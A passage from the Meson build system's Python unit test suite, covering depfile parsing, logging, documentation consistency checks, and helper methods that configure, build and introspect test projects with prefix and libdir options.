# \\ handling (['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})), # $ handling (['f$o.o: c/b'], 'f$o.o', set({'c/b'})), (['f$$o.o: c/b'], 'f$o.o', set({'c/b'})), # cycles (['a: b', 'b: a'], 'a', set({'a', 'b'})), (['a: b', 'b: a'], 'b', set({'a', 'b'})), ]: d = mesonbuild.depfile.DepFile(f) deps = d.get_all_dependencies(target) self.assertEqual(sorted(deps), sorted(expdeps)) def test_log_once(self): f = io.StringIO() with mock.patch('mesonbuild.mlog.log_file', f), \ mock.patch('mesonbuild.mlog._logged_once', set()): mesonbuild.mlog.log_once('foo') mesonbuild.mlog.log_once('foo') actual = f.getvalue().strip() self.assertEqual(actual, 'foo', actual) def test_log_once_ansi(self): f = io.StringIO() with mock.patch('mesonbuild.mlog.log_file', f), \ mock.patch('mesonbuild.mlog._logged_once', set()): mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo')) mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo')) actual = f.getvalue().strip() self.assertEqual(actual.count('foo'), 1, actual) mesonbuild.mlog.log_once('foo') actual = f.getvalue().strip() self.assertEqual(actual.count('foo'), 1, actual) f.truncate() mesonbuild.mlog.warning('bar', once=True) mesonbuild.mlog.warning('bar', once=True) actual = f.getvalue().strip() self.assertEqual(actual.count('bar'), 1, actual) def test_sort_libpaths(self): sort_libpaths = mesonbuild.dependencies.base.sort_libpaths self.assertEqual(sort_libpaths( ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) def test_dependency_factory_order(self): b = mesonbuild.dependencies.base with tempfile.TemporaryDirectory() as tmpdir: with chdir(tmpdir): env = get_fake_env() env.scratch_dir = tmpdir f = b.DependencyFactory( 'test_dep', methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE] ) actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})] self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake']) f = b.DependencyFactory( 'test_dep', methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG] ) actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})] self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig']) def test_validate_json(self) -> None: """Validate the json schema for the test cases.""" try: from jsonschema import validate, ValidationError except ImportError: if is_ci(): raise raise unittest.SkipTest('Python jsonschema module not found.') with Path('data/test.schema.json').open() as f: schema = json.load(f) errors = [] # type: T.Tuple[str, Exception] for p in Path('test cases').glob('**/test.json'): with p.open() as f: try: validate(json.load(f), schema=schema) except ValidationError as e: errors.append((p.resolve(), e)) for f, e in errors: print('Failed to validate: "{}"'.format(f)) print(str(e)) self.assertFalse(errors) @unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release') class DataTests(unittest.TestCase): def test_snippets(self): hashcounter = re.compile('^ *(#)+') snippet_dir = Path('docs/markdown/snippets') self.assertTrue(snippet_dir.is_dir()) for f in snippet_dir.glob('*'): self.assertTrue(f.is_file()) if f.parts[-1].endswith('~'): continue if f.suffix == '.md': in_code_block = False with f.open() as snippet: for line in snippet: if line.startswith(' '): continue if line.startswith('```'): in_code_block = not in_code_block if in_code_block: continue m = re.match(hashcounter, line) if m: self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name) self.assertFalse(in_code_block, 'Unclosed code block.') else: if f.name != 'add_release_note_snippets_here': self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name) def test_compiler_options_documented(self): ''' Test that C and C++ compiler options and base options are documented in Builtin-Options.md. Only tests the default compiler for the current platform on the CI. ''' md = None with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) env = get_fake_env() # FIXME: Support other compilers cc = env.detect_c_compiler(MachineChoice.HOST) cpp = env.detect_cpp_compiler(MachineChoice.HOST) for comp in (cc, cpp): for opt in comp.get_options().keys(): self.assertIn(opt, md) for opt in comp.base_options: self.assertIn(opt, md) self.assertNotIn('b_unknown', md) @staticmethod def _get_section_content(name, sections, md): for section in sections: if section and section.group(1) == name: try: next_section = next(sections) end = next_section.start() except StopIteration: end = len(md) # Extract the content for this section return md[section.end():end] raise RuntimeError('Could not find "{}" heading'.format(name)) def test_builtin_options_documented(self): ''' Test that universal options and base options are documented in Builtin-Options.md. ''' from itertools import tee md = None with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) found_entries = set() sections = re.finditer(r"^## (.+)$", md, re.MULTILINE) # Extract the content for this section content = self._get_section_content("Universal options", sections, md) subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE)) subcontent1 = self._get_section_content("Directories", subsections[0], content) subcontent2 = self._get_section_content("Core options", subsections[1], content) for subcontent in (subcontent1, subcontent2): # Find the option names options = set() # Match either a table row or a table heading separator: | ------ | rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE) # Skip the header of the first table next(rows) # Skip the heading separator of the first table next(rows) for m in rows: value = m.group(1) # End when the `buildtype` table starts if value is None: break options.add(value) self.assertEqual(len(found_entries & options), 0) found_entries |= options self.assertEqual(found_entries, set([ *mesonbuild.coredata.BUILTIN_OPTIONS.keys(), *mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE.keys() ])) # Check that `buildtype` table inside `Core options` matches how # setting of builtin options behaves # # Find all tables inside this subsection tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE) # Get the table we want using the header of the first column table = self._get_section_content('buildtype', tables, subcontent2) # Get table row data rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE) env = get_fake_env() for m in rows: buildtype, debug, opt = m.groups() if debug == 'true': debug = True elif debug == 'false': debug = False else: raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group())) env.coredata.set_builtin_option('buildtype', buildtype) self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype) self.assertEqual(env.coredata.builtins['optimization'].value, opt) self.assertEqual(env.coredata.builtins['debug'].value, debug) def test_cpu_families_documented(self): with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) sections = re.finditer(r"^## (.+)$", md, re.MULTILINE) content = self._get_section_content("CPU families", sections, md) # Find the list entries arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)] # Drop the header arches = set(arches[1:]) self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families)) def test_markdown_files_in_sitemap(self): ''' Test that each markdown files in docs/markdown is referenced in sitemap.txt ''' with open("docs/sitemap.txt", encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE)) markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md'] exceptions = ['_Sidebar.md'] for f in markdownfiles: if f not in exceptions: self.assertIn(f, toc) def test_vim_syntax_highlighting(self): ''' Ensure that vim syntax highlighting files were updated for new functions in the global namespace in build files. ''' env = get_fake_env() interp = Interpreter(FakeBuild(env), mock=True) with open('data/syntax-highlighting/vim/syntax/meson.vim') as f: res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE) defined = set([a.strip() for a in res.group().split('\\')][1:]) self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys()))) def test_all_functions_defined_in_ast_interpreter(self): ''' Ensure that the all functions defined in the Interpreter are also defined in the AstInterpreter (and vice versa). ''' env = get_fake_env() interp = Interpreter(FakeBuild(env), mock=True) astint = AstInterpreter('.', '', '') self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys())) def test_mesondata_is_up_to_date(self): from mesonbuild.mesondata import mesondata err_msg = textwrap.dedent(''' ########################################################### ### mesonbuild.mesondata is not up-to-date ### ### Please regenerate it by running tools/gen_data.py ### ########################################################### ''') root_dir = Path(__file__).resolve().parent mesonbuild_dir = root_dir / 'mesonbuild' data_dirs = mesonbuild_dir.glob('**/data') data_files = [] # type: T.List[T.Tuple(str, str)] for i in data_dirs: for p in i.iterdir(): data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())] from pprint import pprint current_files = set(mesondata.keys()) scanned_files = set([x[0] for x in data_files]) self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n') errors = [] for i in data_files: if mesondata[i[0]].sha256sum != i[1]: errors += [i[0]] self.assertListEqual(errors, [], err_msg + 'Files were changed') class BasePlatformTests(unittest.TestCase): prefix = '/usr' libdir = 'lib' def setUp(self): super().setUp() self.maxDiff = None src_root = os.path.dirname(__file__) src_root = os.path.join(os.getcwd(), src_root) self.src_root = src_root # Get the backend # FIXME: Extract this from argv? self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja')) self.meson_args = ['--backend=' + self.backend.name] self.meson_native_file = None self.meson_cross_file = None self.meson_command = python_command + [get_meson_script()] self.setup_command = self.meson_command + self.meson_args self.mconf_command = self.meson_command + ['configure'] self.mintro_command = self.meson_command + ['introspect'] self.wrap_command = self.meson_command + ['wrap'] self.rewrite_command = self.meson_command + ['rewrite'] # Backend-specific build commands self.build_command, self.clean_command, self.test_command, self.install_command, \ self.uninstall_command = get_backend_commands(self.backend) # Test directories self.common_test_dir = os.path.join(src_root, 'test cases/common') self.vala_test_dir = os.path.join(src_root, 'test cases/vala') self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks') self.unit_test_dir = os.path.join(src_root, 'test cases/unit') self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite') self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike') # Misc stuff self.orig_env = os.environ.copy() if self.backend is Backend.ninja: self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do'] else: # VS doesn't have a stable output when no changes are done # XCode backend is untested with unit tests, help welcome! self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)] self.builddirs = [] self.new_builddir() def change_builddir(self, newdir): self.builddir = newdir self.privatedir = os.path.join(self.builddir, 'meson-private') self.logdir = os.path.join(self.builddir, 'meson-logs') self.installdir = os.path.join(self.builddir, 'install') self.distdir = os.path.join(self.builddir, 'meson-dist') self.mtest_command = self.meson_command + ['test', '-C', self.builddir] self.builddirs.append(self.builddir) def new_builddir(self): if not is_cygwin(): # Keep builddirs inside the source tree so that virus scanners # don't complain newdir = tempfile.mkdtemp(dir=os.getcwd()) else: # But not on Cygwin because that breaks the umask tests. See: # https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523 newdir = tempfile.mkdtemp() # In case the directory is inside a symlinked directory, find the real # path otherwise we might not find the srcdir from inside the builddir. newdir = os.path.realpath(newdir) self.change_builddir(newdir) def _print_meson_log(self): log = os.path.join(self.logdir, 'meson-log.txt') if not os.path.isfile(log): print("{!r} doesn't exist".format(log)) return with open(log, 'r', encoding='utf-8') as f: print(f.read()) def tearDown(self): for path in self.builddirs: try: windows_proof_rmtree(path) except FileNotFoundError: pass os.environ.clear() os.environ.update(self.orig_env) super().tearDown() def _run(self, command, *, workdir=None, override_envvars=None): ''' Run a command while printing the stdout and stderr to stdout, and also return a copy of it ''' # If this call hangs CI will just abort. It is very hard to distinguish # between CI issue and test bug in that case. Set timeout and fail loud # instead. if override_envvars is None: env = None else: env = os.environ.copy() env.update(override_envvars) p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True, cwd=workdir, timeout=60 * 5) print(p.stdout) if p.returncode != 0: if 'MESON_SKIP_TEST' in p.stdout: raise unittest.SkipTest('Project requested skipping.') raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout) return p.stdout def init(self, srcdir, *, extra_args=None, default_args=True, inprocess=False, override_envvars=None, workdir=None): self.assertPathExists(srcdir) if extra_args is None: extra_args = [] if not isinstance(extra_args, list): extra_args = [extra_args] args = [srcdir, self.builddir] if default_args: args += ['--prefix', self.prefix] if self.libdir: args += ['--libdir', self.libdir] if self.meson_native_file: args += ['--native-file', self.meson_native_file] if self.meson_cross_file: args += ['--cross-file', self.meson_cross_file] self.privatedir = os.path.join(self.builddir, 'meson-private') if inprocess: try: (returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars) if 'MESON_SKIP_TEST' in out: raise unittest.SkipTest('Project requested skipping.') if returncode != 0: self._print_meson_log() print('Stdout:\n') print(out) print('Stderr:\n') print(err) raise RuntimeError('Configure failed') except Exception: self._print_meson_log() raise finally: # Close log file to satisfy Windows file locking mesonbuild.mlog.shutdown() mesonbuild.mlog.log_dir = None mesonbuild.mlog.log_file = None else: try: out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir) except unittest.SkipTest: raise unittest.SkipTest('Project requested skipping: ' + srcdir) except Exception: self._print_meson_log() raise return out def build(self, target=None, *, extra_args=None, override_envvars=None): if extra_args is None: extra_args = [] # Add arguments for building the target (if specified), # and using the build dir (if required, with VS) args = get_builddir_target_args(self.backend, self.builddir, target) return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars) def clean(self, *, override_envvars=None): dir_args = get_builddir_target_args(self.backend, self.builddir, None) self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars) def run_tests(self, *, inprocess=False, override_envvars=None): if not inprocess: self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars) else: with mock.patch.dict(os.environ, override_envvars): run_mtest_inprocess(['-C', self.builddir]) def install(self, *, use_destdir=True, override_envvars=None): if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) if use_destdir: destdir = {'DESTDIR': self.installdir} if override_envvars is None: override_envvars = destdir else: override_envvars.update(destdir) self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars) def uninstall(self, *, override_envvars=None): self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars) def run_target(self, target, *, override_envvars=None): ''' Run a Ninja target while printing the stdout and stderr to stdout, and also return a copy of it ''' return self.build(target=target, override_envvars=override_envvars) def setconf(self, arg, will_build=True): if not isinstance(arg, list): arg = [arg] if will_build: ensure_backend_detects_changes(self.backend) self._run(self.mconf_command + arg + [self.builddir]) def wipe(self): windows_proof_rmtree(self.builddir) def utime(self, f): ensure_backend_detects_changes(self.backend) os.utime(f) def get_compdb(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name)) try: with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile: contents = json.load(ifile) except FileNotFoundError: raise unittest.SkipTest('Compiler db not found') # If Ninja is using .rsp files, generate them, read their contents, and # replace it as the command for all compile commands in the parsed json. if len(contents) > 0 and contents[0]['command'].endswith('.rsp'): # Pretend to build so that the rsp files are generated self.build(extra_args=['-d', 'keeprsp', '-n']) for each in contents: # Extract the actual command from the rsp file compiler, rsp = each['command'].split(' @') rsp = os.path.join(self.builddir, rsp) # Replace the command with its contents with open(rsp, 'r', encoding='utf-8') as f: each['command'] = compiler + ' ' + f.read() return contents def get_meson_log(self): with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f: return f.readlines() def get_meson_log_compiler_checks(self): ''' Fetch a list command-lines run by meson for compiler checks. Each command-line is returned as a list of arguments. ''' log = self.get_meson_log() prefix = 'Command line:' cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)] return cmds def get_meson_log_sanitychecks(self): ''' Same as above, but for the sanity checks that were run ''' log = self.get_meson_log() prefix = 'Sanity check compiler command line:' cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)] return cmds def introspect(self, args): if isinstance(args, str): args = [args] out = subprocess.check_output(self.mintro_command + args + [self.builddir], universal_newlines=True) return json.loads(out) def introspect_directory(self, directory, args): if isinstance(args, str): args = [args] out = subprocess.check_output(self.mintro_command + args + [directory], universal_newlines=True) try: obj = json.loads(out) except Exception as e: print(out) raise e return obj def assertPathEqual(self, path1, path2): ''' Handles a lot of platform-specific quirks related to paths such as separator, case-sensitivity, etc. ''' self.assertEqual(PurePath(path1), PurePath(path2)) def assertPathListEqual(self, pathlist1, pathlist2): self.assertEqual(len(pathlist1), len(pathlist2)) worklist = list(zip(pathlist1, pathlist2)) for i in worklist: if i[0] is None: self.assertEqual(i[0], i[1]) else: self.assertPathEqual(i[0], i[1]) def assertPathBasenameEqual(self, path, basename): msg = '{!r} does not end with {!r}'.format(path, basename) # We cannot use os.path.basename because it returns '' when the path # ends with '/' for some silly reason. This is not how the UNIX utility # `basename` works. path_basename = PurePath(path).parts[-1] self.assertEqual(PurePath(path_basename), PurePath(basename), msg) def assertReconfiguredBuildIsNoop(self): 'Assert that we reconfigured and then there was nothing to do' ret = self.build() self.assertIn('The Meson build system', ret) if self.backend is Backend.ninja: for line in ret.split('\n'): if line in self.no_rebuild_stdout: break else: raise AssertionError('build was reconfigured, but was not no-op') elif self.backend is Backend.vs: # Ensure that some target said that no rebuild was done # XXX: Note CustomBuild did indeed rebuild, because of the regen checker! self.assertIn('ClCompile:\n All outputs are up-to-date.', ret) self.assertIn('Link:\n All outputs are up-to-date.', ret) # Ensure that no targets were built self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)) self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) def assertBuildIsNoop(self): ret = self.build() if self.backend is Backend.ninja: self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout) elif self.backend is Backend.vs: # Ensure that some target of each type said that no rebuild was done # We always have at least one CustomBuild target for the regen checker self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret) self.assertIn('ClCompile:\n All outputs are up-to-date.', ret) self.assertIn('Link:\n All outputs are up-to-date.', ret) # Ensure that no targets were built self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE)) self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)) self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) def assertRebuiltTarget(self, target): ret = self.build() if self.backend is Backend.ninja: self.assertIn('Linking target {}'.format(target), ret) elif self.backend is Backend.vs: # Ensure that this target was rebuilt linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE) self.assertRegex(ret, linkre) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) @staticmethod def get_target_from_filename(filename): base = os.path.splitext(filename)[0] if base.startswith(('lib', 'cyg')): return base[3:] return base def assertBuildRelinkedOnlyTarget(self, target): ret = self.build() if self.backend is Backend.ninja: linked_targets = [] for line in ret.split('\n'): if 'Linking target' in line: fname = line.rsplit('target ')[-1] linked_targets.append(self.get_target_from_filename(fname)) self.assertEqual(linked_targets, [target]) elif self.backend is Backend.vs: # Ensure that this target was rebuilt linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE) matches = linkre.findall(ret) self.assertEqual(len(matches), 1, msg=matches) self.assertEqual(self.get_target_from_filename(matches[0]), target) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) def assertPathExists(self, path): m = 'Path {!r} should exist'.format(path) self.assertTrue(os.path.exists(path), msg=m) def assertPathDoesNotExist(self, path): m = 'Path {!r} should not exist'.format(path) self.assertFalse(os.path.exists(path), msg=m) class AllPlatformTests(BasePlatformTests): ''' Tests that should run on all platforms ''' def test_default_options_prefix(self): ''' Tests that setting a prefix in default_options in project() works. Can't be an ordinary test because we pass --prefix to meson there. https://github.com/mesonbuild/meson/issues/1349 ''' testdir = os.path.join(self.common_test_dir, '88 default options') self.init(testdir, default_args=False) opts = self.introspect('--buildoptions') for opt in opts: if opt['name'] == 'prefix': prefix = opt['value'] self.assertEqual(prefix, '/absoluteprefix') def test_do_conf_file_preserve_newlines(self): def conf_file(in_data, confdata): with temp_filename() as fin: with open(fin, 'wb') as fobj: fobj.write(in_data.encode('utf-8')) with temp_filename() as fout: mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson') with open(fout, 'rb') as fobj: return fobj.read().decode('utf-8') confdata = {'VAR': ('foo', 'bar')} self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n') self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n') def test_do_conf_file_by_format(self): def conf_str(in_data, confdata, vformat): (result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat) return '\n'.join(result) def check_formats(confdata, result): self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result) self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result) self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result) confdata = ConfigurationData() # Key error as they do not exists check_formats(confdata, '/* #undef VAR */\n') # Check boolean confdata.values = {'VAR': (False, 'description')} check_formats(confdata, '#undef VAR\n') confdata.values = {'VAR': (True, 'description')} check_formats(confdata, '#define VAR\n') # Check string confdata.values = {'VAR': ('value', 'description')} check_formats(confdata, '#define VAR value\n') # Check integer confdata.values = {'VAR': (10, 'description')} check_formats(confdata, '#define VAR 10\n') # Check multiple string with cmake formats confdata.values = {'VAR': ('value', 'description')} self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n') self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value') self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n') self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value') # Handles meson format exceptions # Unknown format self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format') # More than 2 params in mesondefine self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson') # Mismatched line with format self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson') self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake') self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@') # Dict value in confdata confdata.values = {'VAR': (['value'], 'description')} self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson') def test_absolute_prefix_libdir(self): ''' Tests that setting absolute paths for --prefix and --libdir work. Can't be an ordinary test because these are set via the command-line. https://github.com/mesonbuild/meson/issues/1341 https://github.com/mesonbuild/meson/issues/1345 ''' testdir = os.path.join(self.common_test_dir, '88 default options') # on Windows, /someabs is *not* an absolute path prefix = 'x:/someabs' if is_windows() else '/someabs' libdir = 'libdir' extra_args = ['--prefix=' + prefix, # This can just be a relative path, but we want to test # that passing this as an absolute path also works '--libdir=' + prefix + '/' + libdir] self.init(testdir, extra_args=extra_args, default_args=False) opts = self.introspect('--buildoptions') for opt in opts: if opt['name'] == 'prefix': self.assertEqual(prefix, opt['value']) elif opt['name'] == 'libdir': self.assertEqual(libdir, opt['value']) def test_libdir_must_be_inside_prefix(self): ''' Tests that libdir is forced to be inside prefix no matter how it is set. Must be a unit test for obvious reasons. ''' testdir = os.path.join(self.common_test_dir, '1 trivial') # libdir being inside prefix is ok if is_windows(): args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32'] else: args = ['--prefix', '/opt', '--libdir', '/opt/lib32'] self.init(testdir, extra_args=args) self.wipe() # libdir not being inside prefix is not ok if is_windows(): args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32'] else: args = ['--prefix', '/usr', '--libdir', '/opt/lib32'] self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args) self.wipe() # libdir must be inside prefix even when set via mesonconf self.init(testdir) if is_windows(): self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False) else: self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False) def test_prefix_dependent_defaults(self): ''' Tests that configured directory paths are set to prefix dependent defaults. ''' testdir = os.path.join(self.common_test_dir, '1 trivial') expected = { '/opt': {'prefix': '/opt', 'bindir': 'bin', 'datadir': 'share', 'includedir': 'include', 'infodir': 'share/info', 'libexecdir': 'libexec', 'localedir': 'share/locale', 'localstatedir': 'var', 'mandir': 'share/man', 'sbindir': 'sbin', 'sharedstatedir': 'com', 'sysconfdir': 'etc'}, '/usr': {'prefix': '/usr', 'bindir': 'bin', 'datadir': 'share', 'includedir': 'include', 'infodir': 'share/info', 'libexecdir': 'libexec', 'localedir': 'share/locale', 'localstatedir': '/var', 'mandir': 'share/man', 'sbindir': 'sbin', 'sharedstatedir': '/var/lib', 'sysconfdir': '/etc'}, '/usr/local': {'prefix': '/usr/local', 'bindir': 'bin', 'datadir': 'share', 'includedir': 'include', 'infodir': 'share/info', 'libexecdir': 'libexec', 'localedir': 'share/locale', 'localstatedir': '/var/local', 'mandir': 'share/man', 'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib', 'sysconfdir': 'etc'}, # N.B. We don't check 'libdir' as it's platform dependent, see # default_libdir(): } if mesonbuild.mesonlib.default_prefix() == '/usr/local': expected[None] = expected['/usr/local'] for prefix in expected: args = [] if prefix: args += ['--prefix', prefix] self.init(testdir, extra_args=args, default_args=False) opts = self.introspect('--buildoptions') for opt in opts: name = opt['name'] value = opt['value'] if name in expected[prefix]: self.assertEqual(value, expected[prefix][name]) self.wipe() def test_default_options_prefix_dependent_defaults(self): ''' Tests that setting a prefix in default_options in project() sets prefix dependent defaults for other options, and that those defaults can be overridden in default_options or by the command line. ''' testdir = os.path.join(self.common_test_dir, '164 default options prefix dependent defaults') expected = { '': {'prefix': '/usr', 'sysconfdir': '/etc', 'localstatedir': '/var', 'sharedstatedir': '/sharedstate'}, '--prefix=/usr': {'prefix': '/usr', 'sysconfdir': '/etc', 'localstatedir': '/var', 'sharedstatedir': '/sharedstate'}, '--sharedstatedir=/var/state': {'prefix': '/usr', 'sysconfdir': '/etc', 'localstatedir': '/var', 'sharedstatedir': '/var/state'}, '--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf': {'prefix': '/usr', 'sysconfdir': 'sysconf', 'localstatedir': '/var', 'sharedstatedir': '/var/state'}, } for args in expected: self.init(testdir, extra_args=args.split(), default_args=False) opts = self.introspect('--buildoptions') for opt in opts: name = opt['name'] value = opt['value'] if name in expected[args]: self.assertEqual(value, expected[args][name]) self.wipe() def test_clike_get_library_dirs(self): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) for d in cc.get_library_dirs(env): self.assertTrue(os.path.exists(d)) self.assertTrue(os.path.isdir(d)) self.assertTrue(os.path.isabs(d)) def test_static_library_overwrite(self): ''' Tests that static libraries are never appended to, always overwritten. Has to be a unit test because this involves building a project, reconfiguring, and building it again so that `ar` is run twice on the same static library. https://github.com/mesonbuild/meson/issues/1355 ''' testdir = os.path.join(self.common_test_dir, '3 static') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) static_linker = env.detect_static_linker(cc) if is_windows(): raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526') if not isinstance(static_linker, mesonbuild.linkers.ArLinker): raise unittest.SkipTest('static linker is not `ar`') # Configure self.init(testdir) # Get name of static library targets = self.introspect('--targets') self.assertEqual(len(targets), 1) libname = targets[0]['filename'][0] # Build and get contents of static library self.build() before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split() # Filter out non-object-file contents before = [f for f in before if f.endswith(('.o', '.obj'))] # Static library should contain only one object self.assertEqual(len(before), 1, msg=before) # Change the source to be built into the static library self.setconf('-Dsource=libfile2.c') self.build() after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split() # Filter out non-object-file contents after 